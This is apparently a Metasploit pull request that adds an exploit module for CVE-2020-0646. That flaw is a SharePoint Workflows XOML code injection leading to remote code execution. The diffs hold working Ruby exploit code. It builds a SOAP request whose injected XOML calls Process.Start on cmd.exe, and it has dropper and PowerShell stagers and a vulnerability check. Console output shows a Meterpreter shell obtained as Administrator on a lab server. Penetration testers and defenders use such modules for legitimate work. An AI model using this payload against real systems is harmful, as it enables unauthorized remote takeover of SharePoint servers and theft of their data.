### PR TITLE
Add Exploit Module For CVE-2020-0646 (SharePoint Workflows XOML RCE)

### DIFF
--- a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module exploits a vulnerability within SharePoint and it's .NET backend
+This module exploits a vulnerability within SharePoint and its .NET backend
 that allows an attacker to execute commands using specially crafted XOML data
 sent to SharePoint via the Workflows functionality.
 

--- a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
@@ -1,0 +1,79 @@
+## Vulnerable Application
+
+This module exploits a vulnerability within SharePoint and it's .NET backend
+that allows an attacker to execute commands using specially crafted XOML data
+sent to SharePoint via the Workflows functionality.
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/windows/http/sharepoint_workflows_xoml`
+  1. Set the target options (`RHOSTS`, `RPORT` and `SSL`) as appropriate
+  1. Set the authentication options (`DOMAIN`, `USERNAME` and `PASSWORD`) as appropriate
+  1. Do: `run`
+  1. You should get a shell
+
+## Example
+
+SharePoint 2019 installed on Windows Server 2016 x64.
+
+```
+msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options 
+
+Module options (exploit/windows/http/sharepoint_workflows_xoml):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DOMAIN     WORKGROUP        yes       The domain to use for Windows authentication
+   PASSWORD   Password1        yes       The password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.14   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to the SharePoint application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   administrator    yes       Username to authenticate as
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     4444             yes       The listen port
+   RHOST     192.168.159.14   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Windows Powershell
+
+
+msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit
+
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Started bind TCP handler against 192.168.159.14:4444
+[*] Sending stage (206403 bytes) to 192.168.159.14
+[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.159.14:4444) at 2020-03-23 18:11:44 -0400
+
+meterpreter > sysinfo
+Computer        : SHRPNT2019-P
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : SHRPNT2019P
+Logged On Users : 14
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: SHRPNT2019P\Administrator
+meterpreter >
+```

--- a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
@@ -5,7 +5,6 @@ that allows an attacker to execute commands using specially crafted XOML data
 sent to SharePoint via the Workflows functionality.
 
 ## Verification Steps
-  Example steps in this format (is also in the PR):
 
   1. Install the application
   1. Start msfconsole
@@ -15,9 +14,9 @@ sent to SharePoint via the Workflows functionality.
   1. Do: `run`
   1. You should get a shell
 
-## Example
+## Scenarios
 
-SharePoint 2019 installed on Windows Server 2016 x64.
+### SharePoint 2019 on Server 2016
 
 ```
 msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options 

--- a/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
+++ b/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name' => 'SharePoint Workflows XOML Injection',
       'Description' => %q{
-        This module exploits a vulnerability within SharePoint and it's .NET backend
+        This module exploits a vulnerability within SharePoint and its .NET backend
         that allows an attacker to execute commands using specially crafted XOML data
         sent to SharePoint via the Workflows functionality.
       },

--- a/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
+++ b/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
@@ -1,0 +1,112 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Exploit Module Template',
+      'Description' => %q{
+        Template description.
+      },
+      'Author' => 'Spencer McIntyre',
+      'License' => MSF_LICENSE,
+      'References' => [
+        # ['CVE', ''],
+        # ['EDB', ''],
+        # ['URL', ''],
+      ],
+      'Platform' => 'win',
+      'Targets' => [
+        [ 'Windows (x86)', { 'Arch' => ARCH_X86, 'Type' => :windows_dropper } ],
+        [ 'Windows (x64)', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper } ],
+        [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ]
+      ],
+      'DefaultOptions' => {
+        'SSL' => true
+      },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => '2020-03-02',
+      'Notes' =>
+      # see: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/constants.rb
+      {
+        'Stability' => [CRASH_SAFE,],
+        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION],
+      },
+      'Privileged' => true
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+    register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
+    ])
+  end
+
+  def check
+    # CheckCode::Unknown
+    # CheckCode::Safe
+    # CheckCode::Detected
+    # CheckCode::Appears
+    # CheckCode::Vulnerable
+    # CheckCode::Unsupported
+  end
+
+  def exploit
+    if target['Type'] == :windows_command
+      execute_command(payload.encoded)
+    else
+      cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
+      execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], nodelete: true})
+    end
+  end
+
+  def escape_command(cmd)
+    cmd.gsub('\\', '\\\\\\\\').gsub('"', '\\\\"').gsub('\'', '\\\\\'').gsub('&', '&amp;')
+  end
+
+  def execute_command(cmd, opts = {})
+    xoml_data = <<-EOS
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
+      <workflowMarkupText>
+        <![CDATA[
+          <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
+            <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
+          </SequentialWorkflowActivity>
+        ]]>
+      </workflowMarkupText>
+      <rulesText></rulesText>
+      <configBlob></configBlob>
+      <flag>2</flag>
+    </ValidateWorkflowMarkupAndCreateSupportObjects>
+  </soap:Body>
+</soap:Envelope>
+    EOS
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
+      'ctype' => 'text/xml; charset=utf-8',
+      'data'      => xoml_data,
+      'username'  => datastore['USERNAME'],
+      'password'  => datastore['PASSWORD']
+    })
+
+    unless res&.code == 200
+      print_error('Non-200 HTTP response received while trying to execute the command')
+    end
+  end
+end

--- a/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
+++ b/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
@@ -11,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    # todo: fill out the metadata
     super(update_info(info,
       'Name' => 'SharePoint Workflows XOML Injection',
       'Description' => %q{

--- a/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
+++ b/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
       execute_command(payload.encoded)
     when :windows_dropper
       cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
-      execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], nodelete: true})
+      execute_cmdstager({linemax: cmd_target.opts['Space']})
     when :windows_powershell
       execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
     end

--- a/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
+++ b/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
@@ -7,35 +7,45 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
+    # todo: fill out the metadata
     super(update_info(info,
-      'Name' => 'Exploit Module Template',
+      'Name' => 'SharePoint Workflows XOML Injection',
       'Description' => %q{
-        Template description.
+        This module exploits a vulnerability within SharePoint and it's .NET backend
+        that allows an attacker to execute commands using specially crafted XOML data
+        sent to SharePoint via the Workflows functionality.
       },
-      'Author' => 'Spencer McIntyre',
+      'Author' => [
+        'Spencer McIntyre',
+        'Soroush Dalili'
+      ],
       'License' => MSF_LICENSE,
       'References' => [
-        # ['CVE', ''],
-        # ['EDB', ''],
-        # ['URL', ''],
+        ['CVE', '2020-0646'],
+        ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
       ],
       'Platform' => 'win',
       'Targets' => [
-        [ 'Windows (x86)', { 'Arch' => ARCH_X86, 'Type' => :windows_dropper } ],
-        [ 'Windows (x64)', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper } ],
-        [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ]
+        [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
+        [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
+        [ 'Windows Powershell',
+          'Arch'         => [ARCH_X86, ARCH_X64],
+          'Type'         => :windows_powershell
+        ]
       ],
       'DefaultOptions' => {
-        'SSL' => true
+        'RPORT' => 443,
+        'SSL'   => true
       },
       'DefaultTarget' => 0,
       'DisclosureDate' => '2020-03-02',
       'Notes' =>
-      # see: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/constants.rb
       {
-        'Stability' => [CRASH_SAFE,],
+        'Stability'   => [CRASH_SAFE,],
         'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
         'Reliability' => [REPEATABLE_SESSION],
       },
@@ -44,35 +54,54 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
-      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
       OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
       OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
-    ])
-    register_advanced_options([
-      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
     ])
   end
 
   def check
-    # CheckCode::Unknown
-    # CheckCode::Safe
-    # CheckCode::Detected
-    # CheckCode::Appears
-    # CheckCode::Vulnerable
-    # CheckCode::Unsupported
+    res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
+    return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200
+
+    compiler_errors = extract_compiler_errors(res)
+    return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0
+
+    # once patched you get a specific compiler error message about the type name
+    return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/
+
+    CheckCode::Vulnerable
+  end
+
+  def extract_compiler_errors(res)
+    return nil unless res&.code == 200
+
+    xml_doc = res.get_xml_document
+    result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
+    return nil if result.length == 0
+
+    xml_result = Nokogiri::XML(result)
+    xml_result.xpath('//CompilerError/@Text')
   end
 
   def exploit
-    if target['Type'] == :windows_command
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    case target['Type']
+    when :windows_command
       execute_command(payload.encoded)
-    else
+    when :windows_dropper
       cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
       execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], nodelete: true})
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
     end
   end
 
   def escape_command(cmd)
-    cmd.gsub('\\', '\\\\\\\\').gsub('"', '\\\\"').gsub('\'', '\\\\\'').gsub('&', '&amp;')
+    # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
+    cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
   end
 
   def execute_command(cmd, opts = {})
@@ -97,16 +126,18 @@ class MetasploitModule < Msf::Exploit::Remote
     EOS
 
     res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
-      'ctype' => 'text/xml; charset=utf-8',
-      'data'      => xoml_data,
-      'username'  => datastore['USERNAME'],
-      'password'  => datastore['PASSWORD']
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
+      'ctype'    => 'text/xml; charset=utf-8',
+      'data'     => xoml_data,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
     })
 
     unless res&.code == 200
       print_error('Non-200 HTTP response received while trying to execute the command')
     end
+
+    res
   end
 end


### PR DESCRIPTION
This pull request adds an Exploit for CVE-2020-0646 targeting a vulnerability in Microsoft SharePoint that can be leveraged remotely to execute C# code by escaping a value from XOML data. The original vulnerability was outlined by [MDSec here](https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/).

Both patched and unpatched systems return compiler errors. On a patched system a specific message is raised though complaining that a name is invalid which is what the exploit module's `check` method uses.

## Verification

- [x] Start msfconsole
- [x]  Do: `use exploit/windows/http/sharepoint_workflows_xoml`
- [x] Set the target options (`RHOSTS`, `RPORT` and `SSL`) as appropriate
- [x] Set the authentication options (`DOMAIN`, `USERNAME` and `PASSWORD`) as appropriate
- [x] Do: `run`
- [x] You should get a shell

## Example
Targeting a SharePoint 2019 installation on Server 2016 x64.

The AutoCheck mixin is used to automatically invoke the check method prior to exploiting the vulnerability, so manually invoking `check` is not necessary.

```
msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Started bind TCP handler against 192.168.159.14:4444
[*] Sending stage (206403 bytes) to 192.168.159.14
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.159.14:4444) at 2020-03-23 18:11:44 -0400
meterpreter > sysinfo
Computer        : SHRPNT2019-P
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT2019P
Logged On Users : 14
Meterpreter     : x64/windows
meterpreter > getuid
Server username: SHRPNT2019P\Administrator
meterpreter >
```